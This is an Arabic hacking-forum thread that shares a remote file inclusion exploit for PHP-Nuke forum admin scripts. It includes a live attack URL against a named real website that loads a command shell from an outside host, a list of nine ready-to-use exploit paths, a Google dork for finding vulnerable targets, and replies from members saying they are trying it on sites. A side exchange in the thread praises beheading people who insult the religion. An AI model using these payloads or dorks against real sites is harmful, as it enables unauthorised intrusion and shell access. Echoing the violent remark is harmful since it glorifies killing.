بسم الله الرحمن الرحيم

ثغره في النيوك طازة وتوها نازله تسمح برفع شل على الموقع ومن نوع ريموت فايل انكلود :)

الخطوره عاليه

المكتشف الفريق التركي على ما اظن وطبعا غير ثغرة اخونا amc

توها نازله لحقوا عليها

مثال على الثغره
http://www.bashgah.net/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://saudih1.jeeran.com/sau.txt?cmd=ls

الاستثمار

modules/Forums/admin/admin_styles.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forums.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forumauth.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_users.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_words.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
------------------------------------------------

البحث في قوقل
"Powered by PHP-NUKE" او inurl:"/modules.php?"

رابط الشل جاهز :) بس حطه مكان http://yourhost/cmd.txt?&cmd=id

http://saudih1.jeeran.com/sau.txt?cmd=id

تحياتي لكم واختراق موفق

بارك الله فيك اخي سعودي هاكرز وجاري التجربة

تحياتي
AG-Spider

الشكرررررررر الجزيل اخوي saudi hackrz
أنشاء الله انشوف اكثر منك
جاري التجربه....

سعودي الله يعطيك العافيه انا ماعندي مشكله فهمت وراح اطبق

بس ابي افهم الرابط الي هو الاستثمار دايم اخذ الرابط وطبق بس ابي افهمه

يعني اذا ماعليك امر لو بس تفصيل بسسسسيط بسطر واحد او سطرين لرابط وليه بحث بقوقل بالطريقه هذي تكون سويت خير

AG-Spider

أخوي سبيدر توقيعك الي انت حاطه احس انه غلط شعار لا اله الا الله خلفيه سوداء وتخوف والي ماسك السيف ينقط منه دم بصراحه ولو مالي دخل بس احس مفروض يكون بشعار التوحيد شي يدل على الراحه على الرحمه الظاهر انك فهمت قصدي وما عليش على التدخل

مشكور أخي الكريم Saudi HaCkerz على الثغرة الجميلة

لكن للأسف أكثر المواقع مسكريها ... أو بيعطوك هيك " Illegal Operation "

تحياتي لك

والسلام عليكم

تسلم استاذنا سعودي , على الثغره وجاري التجربه

سبحان الله الثغرات تطب مره وحده ماتدري وشوبه تبدأ

تحياتي

مشكور أخي الكريم Saudi HaCkerz على الثغرة الجميلة

لكن للأسف أكثر المواقع مسكريها ... أو بيعطوك هيك " Illegal Operation "

تحياتي لك

والسلام عليكم

ياغالي لاتياس وابحث في اكثر من محرك بحث ولاتعتمد على قوقل فقط شوف الياهو وانا لاقي في الياهو مواقع كثيره جدا ومفتوحه الثغره وتسلم عل المرور

وبالنسبه لتقفيلها لاتنسى ان الثغره اللي وضعها اخونا amc مالها كم يوم نازله يعني يقفلوا بسبب الاختراق السابق ولكن راح ترد من جديد ونستفيد من ثغرتنا الجديده

وبالنسبه لاخوي سعودي شوف المثال ياغالي وانسخ من عند modules/ وانت ماشي وضيفها بعد رابط الموقع

وفي اكثر من طريقه للبحث مثلا انا ببعض الاحيان استخدم الطريقه هذي لو مليت |27|
modules/Forums/admin/

واتمنى انكم تستفيدون وماتملون وللمعلوميه المواقع كثيره جدا جدا المستخدمه للنيوك اعتقادي
وهذا راي شخصي انها في المنتديات تبع النيوك او منتديات php

لوتلاحظون اصدار المنتدى :)

أخوي سبيدر توقيعك الي انت حاطه احس انه غلط شعار لا اله الا الله خلفيه سوداء وتخوف والي ماسك السيف ينقط منه دم بصراحه ولو مالي دخل بس احس مفروض يكون بشعار التوحيد شي يدل على الراحه على الرحمه الظاهر انك فهمت قصدي وما عليش على التدخل


اخي K.s.a بارك الله فيك على تعليقك ولكن انا اعتقد ان هو ليس بخطأ وانا اعلان الحرب على من تهجم على المسلمين ورسولنا الكريم فطبعا المسلمين طول عمرهم رافعين الراية البيضاء لغاية ما تتطاول الاعداء على رسولنا فيجب رفع الراية السوداء وانما الصورة مجرد صورة رمزية يعني مجرد تعبير عن مشاعرنا وارادتنا في قطع رأس كل من يتطاول على ديننا ....

ومشكور حبيبي على اهتمامك واسف على لاطالة